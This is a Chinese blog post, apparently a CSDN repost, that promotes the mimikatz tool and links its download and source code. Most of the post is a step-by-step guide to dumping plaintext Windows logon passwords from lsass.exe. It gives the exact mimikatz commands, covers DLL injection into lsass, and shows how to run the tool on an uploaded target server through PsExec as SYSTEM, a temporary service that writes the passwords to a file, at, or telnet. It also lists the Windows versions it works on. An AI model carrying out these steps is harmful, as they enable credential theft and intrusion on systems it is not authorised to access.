关闭

Windows明文密码抓取 法国神器mimikatz_trunk附源码

2585人阅读 评论(0) 收藏 举报
分类:

大家都知道的东西吧,渗透测试常用工具。尤其对社工密码收集来说必备的 法国一个牛B的人写的轻量级调试器,可以帮助安全测试人员抓取Windows密码。

mimikatz 最近发布了它的2.0版本,抓密码命令更加简单了,估计作者也看到了对它这个神器最多的研究就是直接抓密码,为神马不发布一个直接一键版,哈哈哈哈哈。新功能还包括能够通过获取的kerberos登录凭据,绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP) 的登陆认证。建议默认禁止RestrictedAdmin模式登录。更多功能等着大家来发现

http://blog.gentilkiwi.com/mimikatz

法国神器mimikatz20141213+源码 https://www.70sec.com/tools_code/mimikatz.rar

还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章
http://pentestmonkey.net/blog/mi ... asswords-from-lsass

自己尝试了下用 win2008 r2 x64 来测试

 

最后测试成功 wdigest 就是我的明文密码 我还测过密码复杂度在14位以上 包含数字 大小写字母 特殊字符的密码 一样能抓出明文密码来 以前用 wce.exe 或 lslsass.exe 通常是只能从内存里顶多抓出active账号的 lm hash 和 ntlm hash 但用了这个神器抓出明文密码后由此我们可以反推断 在 lsass.exe 里并不是只存有 lm hash 和 ntlm hash 而已
应该还存在有你的明文密码经过某种加密算法 (注意: 是加密算法 而不是hash算法 加密算法是可逆的 hash算法是不可逆的) 这样这个加密算法是可逆的 能被解密出明文 所以进程注入 lsass.exe 时 所调用的 sekurlsa.dll 应该包含了对应的解密算法 逆向功底比较好的童鞋可以尝试去逆向分析一下 然后这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取进程内存等等
下面展示一个 读取扫雷游戏的内存的例子
 
我们还可以通过pause命令来挂起该进程 这个时候游戏的时间就静止了
 
总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~

抓取 lsass.exe 中的用户明文密码:

//提升权限
privilege::debug

//注入dll
inject::process lsass.exe sekurlsa.dll

//抓取密码
@getLogonPasswords

或者直接:
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
 


经测试,通杀:
Windows XP (部分可以)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1

貌似只有 Windows 2000 无法使用,最低支持 Windows XP。

不过,2000/xp 可以用以前的 FindPassword ,Windows 2003 - Windows 7 微软的这个处理机制没有变。

域也可以,理论上是没问题的,登录过都在 lsass.exe 里面。

原理就是登陆的时候输入的密码,经过 lsass.exe 里的 wdigest 和 tspkg 两个模块调用后,它们对之进行加密处理,而没有进行擦除,而且该加密通过特征可以定位,并且按照微软的算法可逆。

只要登陆过,就可以抓出来,它进行枚举的,这一切都是微软的错。

简单地说,在 Windows 中,当用户登录时,lsass.exe 使用一个可逆的算法,加密过的明文密码,并且把密文保存在内存中,没有清理,然后可以抓出来,还原。

也就是说,开机以后,只要是登陆过的用户,在没重启前(因为重启内存就清零了,这里不包括使用其他方法清理内存),都可以抓出来,注销也是无用的,因为内存中的密码并没有清除,所以还是可以抓出来的。

我想微软可能会出个补丁,清理这块……

这玩意儿功能还有很多,自己看看参数,例如:ts,是调用 mimikatz.sys 隐藏登陆的终端。

这应该算是密码泄露,很严重的漏洞,估计微软会出补丁。

看雪已经有详细的原理分析帖子了,并且还在更新,地址:http://bbs.pediy.com/showthread.php?t=146884

在远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:

通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。

这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:

首先提取几个文件,只抓取密码的话,只需要这几个文件:

mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll

打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

然后使用以下任何一种方法即可抓取密码:

//最简单实用的方法,使用 PsExec.exe 启动。
//在系统帐户中运行 cmd.exe,或者直接运行 mimikatz.exe
psexec -s cmd.exe
//启动 mimikatz.exe
C:\mimikatz_trunk\Win32\mimikatz.exe
//提升权限
privilege::debug
//注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
//抓取密码
@getLogonPasswords
//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
exit

//*********************************************************

//使用 At 启动
at ***

//*********************************************************

//创建服务方法
sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
sc start getpassword
sc delete getpassword

//*********************************************************

//telnet 远程命令管道
telnet ****

转载自https://www.70sec.com/thread-2954-1-1.html

0
1

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:97539次
    • 积分:1111
    • 等级:
    • 排名:千里之外
    • 原创:8篇
    • 转载:37篇
    • 译文:0篇
    • 评论:5条
    最新评论